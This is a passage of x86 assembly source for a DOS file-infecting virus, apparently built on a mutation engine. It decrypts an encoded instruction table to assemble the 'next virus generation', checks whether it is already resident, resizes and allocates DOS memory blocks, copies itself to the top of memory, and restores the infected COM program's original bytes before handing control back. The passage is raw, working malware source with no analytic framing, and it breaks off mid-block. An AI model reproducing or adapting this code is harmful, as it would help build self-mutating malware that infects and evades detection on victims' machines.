exam_bl__ db 11101110b ; Beginning of block
dw 0bc2h ; Block identification of exam_bl__
db 02h ; Two bytes instruction
cmp al,11101111b ; End of block?
db 01110100b+10000000b ; Equal? Jump to end_of_bloc
dw 0bc9h ; Pointer to end_of_bloc
db 02h ; Two bytes instruction
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
db 01110011b+10000000b ; Above or equal? Jump to exam_data_
dw 0bc4h ; Pointer to exam_data_
db 02h ; Two bytes instruction
cmp al,10h ; Data?
db 01110110b+10000000b ; Below or equal? Jump to sto_instruc
dw 0bc3h ; Pointer to sto_instruc
db 02h ; Two bytes instruction
sub al,10h ; AL = length of data
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc3h ; Pointer to sto_instruc
db 11101111b ; End of block
sto_instruc db 11101110b ; Beginning of block
dw 0bc3h ; Block identification of sto_instruc
db 02h ; Two bytes instruction
xor cx,cx ; Zero CX
db 02h ; Two bytes instruction
mov cl,al ; CL = length of instruction
db 01h ; One byte instruction
push di ; Save DI at stack
db 02h ; Two bytes instruction
mov di,bx ; DI = offset within next virus ge...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0beah ; Pointer to sto_ins_loo
db 11101111b ; End of block
sto_ins_loo db 11101110b ; Beginning of block
dw 0beah ; Block identification of sto_ins_loo
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 01h ; One byte instruction
stosb ; Store byte of instruction
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo
dw 0beah ; Pointer to sto_ins_loo
db 02h ; Two bytes instruction
mov bx,di ; BX = offset within next virus ge...
db 01h ; One byte instruction
pop di ; Load DI from stack
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc1h ; Pointer to exam_bl_
db 11101111b ; End of block
exam_data_ db 11101110b ; Beginning of block
dw 0bc4h ; Block identification of exam_data_
db 02h ; Two bytes instruction
cmp al,11101101b ; Data reference?
db 01110101b+10000000b ; Not equal? Jump to exam_bl___
dw 0bc5h ; Pointer to exam_bl___
db 01h ; One byte instruction
push di ; Load DI from stack
db 05h ; Five bytes instruction
mov di,es:[08h] ; DI = offset within data information
db 02h ; Two bytes instruction
mov ax,bx ; AX = offset within next virus ge...
db 01h ; One byte instruction
dec ax ; Decrease offset within next viru...
db 01h ; One byte instruction
dec ax ; Decrease offset within next viru...
db 01h ; One byte instruction
stosw ; Store offset within next virus g...
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be1h ; Pointer to decrypt_id_
db 01h ; One byte instruction
stosw ; Store block identification
db 05h ; Five bytes instruction
mov es:[08h],di ; Store offset within data informa...
db 01h ; One byte instruction
pop di ; Load DI from stack
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc1h ; Pointer to exam_bl_
db 11101111b ; End of block
exam_bl___ db 11101110b ; Beginning of block
dw 0bc5h ; Block identification of exam_bl___
db 02h ; Two bytes instruction
cmp al,11101110b ; Beginning of block?
db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_
dw 0bc7h ; Pointer to sto_call_jm_
db 01h ; One byte instruction
push di ; Save DI at stack
db 05h ; Five bytes instruction
mov di,es:[04h] ; DI = offset within block informa...
db 02h ; Two bytes instruction
mov ax,bx ; AX = offset within next virus ge...
db 01h ; One byte instruction
stosw ; Store offset within next virus ge...
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be1h ; Pointer to decrypt_id_
db 01h ; One byte instruction
stosw ; Store block identification
db 05h ; Five bytes instruction
mov es:[04h],di ; Store offset within block inform...
db 03h ; Three bytes instruction
cmp ax,4c5h ; Block identification of tmc_table_?
db 01110101b+10000000b ; Not equal? Jump to exam_messag
dw 0bc6h ; Pointer to exam_messag
db 01h ; One byte instruction
push si ; Save SI at stack
db 02h ; Two bytes instruction
mov di,bx ; DI = offset within next virus ge...
db 04h ; Four bytes instruction
lea si,[bp+1234h] ; SI = offset of tmc_table_
db 11101101b ; Data reference
dw 4c5h ; Pointer to tmc_table_
db 03h ; Three bytes instruction
mov cx,(table_end-table_begin)
db 02h ; Two bytes instruction
rep movsb ; Move table to top of memory
db 02h ; Two bytes instruction
mov bx,di ; BX = offset within next virus ge...
db 01h ; One byte instruction
pop si ; Load SI from stack
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bebh ; Pointer to examine_nex
db 11101111b ; End of block
exam_messag db 11101110b ; Beginning of block
dw 0bc6h ; Block identification of exam_messag
db 03h ; Three bytes instruction
cmp ax,2328h ; Block identification of message?
db 01110101b+10000000b ; Not equal? Jump to exam_probab
dw 0bedh ; Pointer to exam_probab
db 03h ; Three bytes instruction
mov ax,14h ; Probability of including message
db 04h ; Four bytes instruction
cmp [bp+1234h],ax ; Include message?
db 11101101b ; Data reference
dw 0bech ; Pointer to probability_
db 01110011b+10000000b ; Above or equal? Jump to examine_...
dw 0bebh ; Pointer to examine_nex
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 02h ; Two bytes instruction
sub al,10h ; AL = length of message
db 02h ; Two bytes instruction
mov ah,00h ; Zero AH
db 02h ; Two bytes instruction
add si,ax ; SI = offset of end of message
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bebh ; Pointer to examine_nex
db 11101111b ; End of block
exam_probab db 11101110b ; Beginning of block
dw 0bedh ; Block identification of exam_probab
db 03h ; Three bytes instruction
cmp ax,0bech ; Block identification of probabi...?
db 01110101b+10000000b ; Not equal? Jump to examine_nex
dw 0bebh ; Pointer to examine_nex
db 04h ; Four bytes instruction
mov ax,[bp+1234h] ; AX = probability_
db 11101101b ; Data reference
dw 0bech ; Pointer to probability_
db 01h ; One byte instruction
dec ax ; Decrease probability
db 03h ; Three bytes instruction
cmp ax,05h ; Probability too small?
db 01110011b+10000000b ; Above or equal? Jump to store_pr...
dw 0bf5h ; Pointer to store_proba
db 03h ; Three bytes instruction
mov ax,64h ; Reset probability
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bf5h ; Pointer to store_proba
db 11101111b ; End of block
store_proba db 11101110b ; Beginning of block
dw 0bf5h ; Block identification of store_proba
db 03h ; Three bytes instruction
mov es:[bx],ax ; Store probability
db 03h ; Three bytes instruction
add bx,02h ; Add two to offset within next vi...
db 03h ; Three bytes instruction
add si,03h ; SI = offset of beginning of next...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bebh ; Pointer to examine_nex
db 11101111b ; End of block
examine_nex db 11101110b ; Beginning of block
dw 0bebh ; Block identification of examine_nex
db 01h ; One byte instruction
pop di ; Load DI from stack
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc2h ; Pointer to exam_bl__
db 11101111b ; End of block
sto_call_jm_ db 11101110b ; Beginning of block
dw 0bc7h ; Block identification of sto_call...
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push di ; Save DI at stack
db 05h ; Five bytes instruction
mov di,es:[06h] ; DI = offset within CALL; JMP; Jc...
db 02h ; Two bytes instruction
mov ax,bx ; AX = offset within next virus ge...
db 01h ; One byte instruction
stosw ; Store offset within next virus g...
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be1h ; Pointer to decrypt_id_
db 01h ; One byte instruction
stosw ; Store block identification
db 05h ; Five bytes instruction
mov es:[06h],di ; Store offset within CALL; JMP; J...
db 01h ; One byte instruction
pop di ; Load DI from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 03h ; Three bytes instruction
mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc...
db 03h ; Three bytes instruction
add bx,03h ; Add three to offset within next ...
db 02h ; Two bytes instruction
cmp al,11110000b ; Jump condition?
db 01110010b+10000000b ; Below? Jump to exam_bl_
dw 0bc1h ; Pointer to exam_bl_
db 01h ; One byte instruction
inc bx ; Increase offset within next viru...
db 01h ; One byte instruction
inc bx ; Increase offset within next viru...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc1h ; Pointer to exam_bl_
db 11101111b ; End of block
split_bloc_ db 11101110b ; Beginning of block
dw 0bc8h ; Block identification of split_bloc_
db 04h ; Four bytes instruction
mov es:[di+02h],bx ; Store offset within next virus g...
db 03h ; Three bytes instruction
add bx,03h ; Add three to offset within next ...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc9h ; Pointer to end_of_bloc
db 11101111b ; End of block
end_of_bloc db 11101110b ; Beginning of block
dw 0bc9h ; Block identification of end_of_bloc
db 01h ; One byte instruction
dec si ; Decrease offset of block within ...
db 03h ; Three bytes instruction
mov es:[di],si ; Store offset of block within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bbdh ; Pointer to of split_bloc
db 11101111b ; End of block
exam_tbl_in db 11101110b ; Beginning of block
dw 0bcah ; Block identification of exam_tbl_in
db 06h ; Six bytes instruction
cmp word ptr es:[0ch],00h
db 01110101b+10000000b ; End of second table? Jump to cor...
dw 0fa1h ; Pointer to correc_i16
db 01h ; One byte instruction
pop si ; Load SI from stack
db 05h ; Five bytes instruction
mov es:[0ch],bx ; Store offset within next virus g...
db 04h ; Four bytes instruction
add si,(second_table-first_table)
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0fa0h ; Pointer to initial_tmc
db 11101111b ; End of block
correc_i16 db 11101110b ; Beginning of block
dw 0fa1h ; Block identification of correc_i16
db 01h ; One byte instruction
push es ; Save ES at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (ES)
db 04h ; Four bytes instruction
sub bx,730h ; Subtract offset of next virus ge...
db 04h ; Four bytes instruction
mov ds:[0eh],bx ; Store length of virus
db 03h ; Three bytes instruction
mov si,2c8h ; SI = offset of CALL; JMP; Jcc im...
db 04h ; Four bytes instruction
mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;...
db 02h ; Two bytes instruction
sub cx,si ; Subtract offset of CALL; JMP; Jc...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of CALL imm16; JMP...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of CALL imm16; JMP...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bcbh ; Pointer to jmp_call_lo
db 11101111b ; End of block
jmp_call_lo db 11101110b ; Beginning of block
dw 0bcbh ; Block identification of jmp_call_lo
db 01h ; One byte instruction
lodsw ; AX = offset of block within data...
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
lodsw ; AX = offset of block within data...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 01h ; One byte instruction
push si ; Save SI at stack
db 03h ; Three bytes instruction
mov si,118h ; SI = offset of block information
db 04h ; Four bytes instruction
mov cx,ds:[04h] ; CX = offset of end of block info...
db 02h ; Two bytes instruction
sub cx,si ; Subtract offset of block informa...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of block by two
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of block by two
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bcch ; Pointer to find_block__
db 11101111b ; End of block
find_block__ db 11101110b ; Beginning of block
dw 0bcch ; Block identification of find_blo...
db 03h ; Three bytes instruction
cmp ax,[si+02h] ; Found block?
db 01110100b+10000000b ; Equal? Jump to found_bloc
dw 0bcdh ; Pointer to found_bloc
db 03h ; Three bytes instruction
add si,04h ; SI = offset of next block in table
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to find_block__
dw 0bcch ; Pointer to find_block__
db 11101111b ; End of block
found_bloc db 11101110b ; Beginning of block
dw 0bcdh ; Block identification of found_bloc
db 02h ; Two bytes instruction
mov dx,[si] ; DX = offset of block
db 01h ; One byte instruction
pop si ; Load SI from stack
db 01h ; One byte instruction
pop cx ; Load CX from stack
db 01h ; One byte instruction
pop bx ; Load BX from stack (AX)
db 02h ; Two bytes instruction
mov al,[bx] ; AL = first byte of instruction
db 02h ; Two bytes instruction
cmp al,11110000b ; Jump condition?
db 01110010b+10000000b ; Below? Jump to sto_call_j
dw 0bcfh ; Pointer to sto_call_j
db 03h ; Three bytes instruction
sub byte ptr [bx],10000000b
db 01h ; One byte instruction
inc bx ; BX = offset of 8-bit immediate
db 01h ; One byte instruction
push dx ; Save DX at stack
db 02h ; Two bytes instruction
sub dx,bx ; Subtract offset within next viru...
db 01h ; One byte instruction
dec dx ; Decrease 8-bit immediate
db 03h ; Three bytes instruction
cmp dx,7fh ; 8-bit immediate out of range?
db 01111111b+10000000b ; Greater? Jump to invert_jcc_
dw 0bceh ; Pointer to invert_jcc_
db 03h ; Three bytes instruction
cmp dx,0ff80h ; 8-bit immediate out of range?
db 01111100b+10000000b ; Less? Jump to invert_jcc_
dw 0bceh ; Pointer to invert_jcc_
db 02h ; Two bytes instruction
mov [bx],dl ; Store 8-bit immediate
db 01h ; One byte instruction
inc bx ; BX = offset of end of Jcc imm8
db 04h ; Four bytes instruction
mov [bx],1001000010010000b
db 04h ; Four bytes instruction
mov byte ptr [bx+02h],10010000b
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bd0h ; Pointer to correc_i16_
db 11101111b ; End of block
invert_jcc_ db 11101110b ; Beginning of block
dw 0bceh ; Block identification of invert_jcc_
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
dec bx ; BX = offset of Jcc imm8
db 03h ; Three bytes instruction
xor byte ptr [bx],00000001b
db 01h ; One byte instruction
inc bx ; BX = offset of 8-bit immediate
db 03h ; Three bytes instruction
mov byte ptr [bx],03h ; Store 8-bit immediate
db 01h ; One byte instruction
inc bx ; BX = offset of JMP imm16
db 02h ; Two bytes instruction
mov al,11101001b ; JMP imm16 (opcode 0e9h)
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bcfh ; Pointer to sto_call_j
db 11101111b ; End of block
sto_call_j db 11101110b ; Beginning of block
dw 0bcfh ; Block identification of sto_call_j
db 02h ; Two bytes instruction
mov [bx],al ; Store CALL imm16; JMP imm16
db 01h ; One byte instruction
inc bx ; BX = offset of 16-bit immediate
db 02h ; Two bytes instruction
sub dx,bx ; Subtract offset within next viru...
db 01h ; One byte instruction
dec dx ; Decrease 16-bit immediate
db 01h ; One byte instruction
dec dx ; Decrease 16-bit immediate
db 02h ; Two bytes instruction
mov [bx],dx ; Store 16-bit immediate
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bd0h ; Pointer to correc_i16_
db 11101111b ; End of block
correc_i16_ db 11101110b ; Beginning of block
dw 0bd0h ; Block identification of correc_16_
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo
dw 0bcbh ; Pointer to jmp_call_lo
db 03h ; Three bytes instruction
mov si,5a8h ; SI = offset of data information
db 04h ; Four bytes instruction
mov cx,ds:[08h] ; CX = offset of end of data infor...
db 02h ; Two bytes instruction
sub cx,si ; Subtract offset of data informat...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of data references...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of data references...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bd1h ; Pointer to data_ref_lo
db 11101111b ; End of block
data_ref_lo db 11101110b ; Beginning of block
dw 0bd1h ; Block identification of data_ref_lo
db 01h ; One byte instruction
lodsw ; AX = offset of block within data...
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
lodsw ; AX = offset of block within data...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 01h ; One byte instruction
push si ; Save SI at stack
db 03h ; Three bytes instruction
mov si,118h ; SI = offset of block information
db 04h ; Four bytes instruction
mov cx,ds:[04h] ; CX = offset of end of block info...
db 02h ; Two bytes instruction
sub cx,si ; Subtract offset of block informa...
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of block by two
db 02h ; Two bytes instruction
shr cx,01h ; Divide number of block by two
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bd2h ; Pointer to find_bloc
db 11101111b ; End of block
find_bloc db 11101110b ; Beginning of block
dw 0bd2h ; Block identification to find_bloc
db 03h ; Three bytes instruction
cmp ax,[si+02h] ; Found block?
db 01110100b+10000000b ; Equal? Jump to found_bloc_
dw 0bd3h ; Pointer to found_bloc_
db 03h ; Three bytes instruction
add si,04h ; SI = offset of next block in table
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to find_bloc
dw 0bd2h ; Pointer to find_bloc
db 11101111b ; End of block
found_bloc_ db 11101110b ; Beginning of block
dw 0bd3h ; Block identification of found_bloc_
db 02h ; Two bytes instruction
mov ax,[si] ; AX = offset of block
db 01h ; One byte instruction
pop si ; Load SI from stack
db 01h ; One byte instruction
pop cx ; Load CX from stack
db 01h ; One byte instruction
pop bx ; Load BX from stack (AX)
db 03h ; Three bytes instruction
sub ax,730h ; Subtract offset of next virus ge...
db 02h ; Two bytes instruction
mov [bx],ax ; Store 16-bit immediate
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to data_ref_lo
dw 0bd1h ; Pointer to data_ref_lo
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1772h ; Pointer to restore_cod
db 11101111b ; End of block
restore_cod db 11101110b ; Beginning of block
dw 1772h ; Block identification of restore_cod
db 04h ; Four bytes instruction
mov ax,[bp+1234h] ; AX = segment of PSP for current ...
db 11101101b ; Data reference
dw 0befh ; Pointer to program_seg_
db 04h ; Four bytes instruction
mov cx,[bp+1234h] ; CX = initial SS relative to star...
db 11101101b ; Data reference
dw 138ah ; Pointer to initial_ss_
db 03h ; Three bytes instruction
add cx,10h ; Add ten to initial SS relative t...
db 02h ; Two bytes instruction
add cx,ax ; Add segment of PSP for current p...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 04h ; Four bytes instruction
push [bp+1234h] ; Save initial SP at stack
db 11101101b ; Data reference
dw 138ch ; Pointer to initial_sp_
db 04h ; Four bytes instruction
mov cx,[bp+1234h] ; CX = initial CS relative to star...
db 11101101b ; Data reference
dw 1389h ; Pointer to initial_cs_
db 03h ; Three bytes instruction
add cx,10h ; Add ten to initial CS relative t...
db 02h ; Two bytes instruction
add cx,ax ; Add segment of PSP for current p...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 04h ; Four bytes instruction
push [bp+1234h] ; Save initial IP at stack
db 11101101b ; Data reference
dw 138bh ; Pointer to initial_ip_
db 01h ; One byte instruction
push ax ; Save segment of PSP for current ...
db 04h ; Four bytes instruction
push [bp+1234h] ; Save size of memory block in par...
db 11101101b ; Data reference
dw 1395h ; Pointer to mcb_size__
db 01h ; One byte instruction
push ds ; Save DS at stack
db 02h ; Two bytes instruction
mov cl,00h ; COM executable
db 04h ; Four bytes instruction
cmp [bp+1234h],cl ; COM executable?
db 11101101b ; Data reference
dw 1388h ; Pointer to executa_sta
db 01110101b+10000000b ; Not equal? Jump to move_virus__
dw 1390h ; Pointer to move_virus__
db 04h ; Four bytes instruction
lea si,[bp+1234h] ; SI = offset of origin_code_
db 11101101b ; Data reference
dw 1f40h ; Pointer to origin_code_
db 03h ; Three bytes instruction
mov ax,cs:[si] ; AX = first two bytes of original...
db 04h ; Four bytes instruction
mov cs:[100h],ax ; Store first two bytes of origina...
db 04h ; Four bytes instruction
mov al,cs:[si+02h] ; AL = last byte of original code ...
db 04h ; Four bytes instruction
mov cs:[100h+02h],al ; Store last byte of original code...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1390h ; Pointer to move_virus__
db 11101111b ; End of block
db 11101110b ; Beginning of block
dw 1774h
db 04h ; Four bytes instruction
mov ax,[bp+1234h] ; AX = segment of PSP for current ...
db 11101101b ; Data reference
dw 0befh ; Pointer to program_seg_
db 04h ; Four bytes instruction
mov cx,[bp+1234h] ; CX = initial SS relative to star...
db 11101101b ; Data reference
dw 138ah ; Pointer to initial_ss_
db 03h ; Three bytes instruction
add cx,10h ; Add ten to initial SS relative t...
db 02h ; Two bytes instruction
add cx,ax ; Add segment of PSP for current p...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 04h ; Four bytes instruction
push [bp+1234h] ; Save initial SP at stack
db 11101101b ; Data reference
dw 138ch ; Pointer to initial_sp_
db 04h ; Four bytes instruction
mov cx,[bp+1234h] ; CX = initial CS relative to star...
db 11101101b ; Data reference
dw 1389h ; Pointer to initial_cs_
db 03h ; Three bytes instruction
add cx,10h ; Add ten to initial CS relative t...
db 02h ; Two bytes instruction
add cx,ax ; Add segment of PSP for current p...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 04h ; Four bytes instruction
push [bp+1234h] ; Save incorrect IP at stack
db 11101101b ; Data reference
dw 1773h ; Pointer to incorrec_ip
db 01h ; One byte instruction
push ax ; Save segment of PSP for current ...
db 04h ; Four bytes instruction
push [bp+1234h] ; Save size of memory block in par...
db 11101101b ; Data reference
dw 1395h ; Pointer to mcb_size__
db 01h ; One byte instruction
push ds ; Save DS at stack
db 02h ; Two bytes instruction
mov cl,00h ; COM executable
db 04h ; Four bytes instruction
cmp [bp+1234h],cl ; COM executable?
db 11101101b ; Data reference
dw 1388h ; Pointer to executa_sta
db 01110101b+10000000b ; Not equal? Jump to move_virus__
dw 1390h ; Pointer to move_virus__
db 04h ; Four bytes instruction
lea si,[bp+1234h] ; SI = offset of incorr_code_
db 11101101b ; Data reference
dw 1776h ; Pointer to incorr_code_
db 03h ; Three bytes instruction
mov ax,cs:[si] ; AX = first two bytes of incorrec...
db 04h ; Four bytes instruction
mov cs:[100h],ax ; Store first two bytes of incorre...
db 04h ; Four bytes instruction
mov al,cs:[si+02h] ; AL = last byte of incorrect code
db 04h ; Four bytes instruction
mov cs:[100h+02h],al ; Store last byte of incorrect code
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1390h ; Pointer to move_virus__
db 11101111b ; End of block
move_virus__ db 11101110b ; Beginning of block
dw 1390h ; Block identification of move_vir...
db 02h ; Two bytes instruction
xor ax,ax ; Zero AX
db 02h ; Two bytes instruction
mov ds,ax ; DS = segment of DOS communicatio...
db 05h ; Five bytes instruction
cmp byte ptr ds:[501h],10h
db 01110100b+10000000b ; Already resident? Jump to virus_...
dw 65h ; Pointer to virus_exit_
db 05h ; Five bytes instruction
mov byte ptr ds:[501h],10h
db 01h ; One byte instruction
push es ; Save ES at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (ES)
db 03h ; Three bytes instruction
mov ax,ds:[0ch] ; AX = offset within next virus ge...
db 03h ; Three bytes instruction
sub ax,730h ; Subtract offset of next virus ge...
db 04h ; Four bytes instruction
mov [bp+1234h],ax ; Store offset of virus_exit
db 11101101b ; Data reference
dw 0bf1h ; Pointer to vir_exit_of
db 04h ; Four bytes instruction
mov cx,ds:[0eh] ; CX = length of virus
db 04h ; Four bytes instruction
mov [bp+1234h],cx ; Store length of virus
db 11101101b ; Data reference
dw 0bf0h ; Pointer to virus_lengt
db 03h ; Three bytes instruction
mov si,730h ; SI = offset of next virus genera...
db 02h ; Two bytes instruction
xor di,di ; Zero DI
db 02h ; Two bytes instruction
rep movsb ; Move virus to top of memory
db 02h ; Two bytes instruction
mov cl,04h ; Divide by paragraphs
db 02h ; Two bytes instruction
shr di,cl ; DI = length of next virus genera...
db 01h ; One byte instruction
inc di ; Increase length of next virus ge...
db 04h ; Four bytes instruction
mov bx,[bp+1234h] ; BX = size of memory block in par...
db 11101101b ; Data reference
dw 1394h ; Pointer to mcb_size___
db 04h ; Four bytes instruction
sub bx,[bp+1234h] ; Subtract new size in paragraphs ...
db 11101101b ; Data reference
dw 1393h ; Pointer to new_mcb_siz
db 02h ; Two bytes instruction
sub bx,di ; Subtract length of next virus ge...
db 01h ; One byte instruction
dec bx ; Decrease new size in paragraphs
db 01h ; One byte instruction
dec bx ; Decrease new size in paragraphs
db 02h ; Two bytes instruction
cmp bx,di ; Insufficient memory?
db 01110010b+10000000b ; Below? Jump to virus_exit_
dw 65h ; Pointer to virus_exit_
db 02h ; Two bytes instruction
mov ah,4ah ; Resize memory block
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to virus_exit_
dw 65h ; Pointer to virus_exit_
db 02h ; Two bytes instruction
mov bx,di ; BX = number of paragraphs to all...
db 02h ; Two bytes instruction
mov ah,48h ; Allocate memory
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to virus_exit_
dw 65h ; Pointer to virus_exit_
db 01h ; One byte instruction
dec ax ; AX = segment of current Memory C...
db 02h ; Two bytes instruction
mov es,ax ; ES = segment of current Memory C...
db 07h ; Seven bytes instruction
mov word ptr es:[01h],08h
db 01h ; One byte instruction
inc ax ; AX = segment of PSP for current ...
db 02h ; Two bytes instruction
mov es,ax ; AX = segment of PSP for current ...
db 04h ; Four bytes instruction
mov cx,[bp+1234h] ; CX = length of virus
db 11101101b ; Data reference
dw 0bf0h ; Pointer to virus_lengt
db 02h ; Two bytes instruction
xor si,si ; Zero SI
db 02h ; Two bytes instruction
xor di,di ; Zero DI
db 02h ; Two bytes instruction
rep movsb ; Move virus to top of memory
db 01h ; One byte instruction
push es ; Save ES at stack
db 04h ; Four bytes instruction
push [bp+1234h] ; Save offset of virus_exit_ at stack
db 11101101b ; Data reference
dw 0bf1h ; Pointer to vir_exit_of
db 04h ; Four bytes instruction
mov al,[bp+1234h] ; AL = 8-bit encryption/decryption...
db 11101101b ; Data reference
dw 0bd7h ; Pointer to crypt_key_
db 04h ; Four bytes instruction
mov ah,[bp+1234h] ; AH = 8-bit sliding encryption/de...
db 11101101b ; Data reference
dw 0bd8h ; Pointer to sliding_key_
db 01h ; One byte instruction
retf ; Return far
db 11101111b ; End of block
terminate_ db 11101110b ; Beginning of block
dw 0beeh ; Block identification of terminate_
db 03h ; Three bytes instruction
mov ax,4c00h ; Terminate with return code
db 02h ; Two bytes instruction
int 21h
db 11101111b ; End of block
get_rnd_num_ db 11101110b ; Beginning of block
dw 0bd4h ; Block identification of get_rnd_...
db 01h ; One byte instruction
push cx ; Save CX at stack
db 02h ; Two bytes instruction
in al,40h ; AL = 8-bit random number
db 02h ; Two bytes instruction
mov ah,al ; AH = 8-bit random number
db 02h ; Two bytes instruction
in al,40h ; AL = 8-bit random number
db 05h ; Five bytes instruction
xor ax,es:[02h] ; AX = 16-bit random number
db 02h ; Two bytes instruction
mov cl,ah ; CL = high-order byte of 16-bit r...
db 02h ; Two bytes instruction
rol ax,cl ; AX = 16-bit random number
db 04h ; Four bytes instruction
mov es:[02h],ax ; Store 16-bit random number
db 01h ; One byte instruction
pop cx ; Load CX from stack
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
rnd_in_rang db 11101110b ; Beginning of block
dw 0bd5h ; Block identification of rnd_in_rang
db 02h ; Two bytes instruction
or bp,bp ; Zero BP?
db 01110100b+10000000b ; Zero? Jump to zero_range_
dw 0bd6h ; Pointer to zero_range_
db 01h ; One byte instruction
push dx ; Save DX at stack
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd4h ; Pointer to get_rnd_num_
db 02h ; Two bytes instruction
xor dx,dx ; Zero DX
db 02h ; Two bytes instruction
div bp ; DX = random number within range
db 01h ; One byte instruction
xchg ax,dx ; AX = random number within range
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
zero_range_ db 11101110b ; Beginning of block
dw 0bd6h ; Block identification of zero_range_
db 02h ; Two bytes instruction
xor ax,ax ; AX = random number within range
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
decrypt_byt db 11101110b ; Beginning of block
dw 0be0h ; Block identification of decrypt_byt
db 04h ; Four bytes instruction
mov [bp+1234h],ah ; Store AH
db 11101101b ; Data reference
dw 0bd9h ; Pointer to ah__
db 02h ; Two bytes instruction
mov ax,si ; AX = offset within table
db 02h ; Two bytes instruction
sub ax,bp ; Subtract delta offset from offse...
db 03h ; Three bytes instruction
sub ax,1234h ; Subtract offset of tmc_table_ fr...
db 11101101b ; Data reference
dw 4c5h ; Pointer to tmc_table_
db 04h ; Four bytes instruction
mul word ptr [bp+1234h] ; AL = 8-bit sliding encryption/de...
db 11101101b ; Data reference
dw 0bd8h ; Pointer to sliding_key_
db 04h ; Four bytes instruction
add al,[bp+1234h] ; AL = 8-bit encryption/decryption...
db 11101101b ; Data reference
dw 0bd7h ; Pointer to crypt_key_
db 02h ; Two bytes instruction
xor al,[si] ; AL = byte of decrypted table
db 04h ; Four bytes instruction
mov ah,[bp+1234h] ; AH = stored AH
db 11101101b ; Data reference
dw 0bd9h ; Pointer to ah__
db 01h ; One byte instruction
inc si ; Increase offset within table
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
decrypt_id_ db 11101110b ; Beginning of block
dw 0be1h ; Block identification of decrypt_id_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 02h ; Two bytes instruction
mov ah,al ; AL = byte of decrypted table
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 02h ; Two bytes instruction
xchg al,ah ; AL = byte of decrypted table
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
virus_exit_ db 11101110b ; Beginning of block
dw 65h ; Block identification of virus_exit_
db 01h ; One byte instruction
pop es ; Load ES from stack
db 02h ; Two bytes instruction
mov ah,49h ; Free memory
db 02h ; Two bytes instruction
int 21h
db 01h ; One byte instruction
pop bx ; Load BX from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 02h ; Two bytes instruction
mov ds,ax ; DS = segment of PSP for current ...
db 02h ; Two bytes instruction
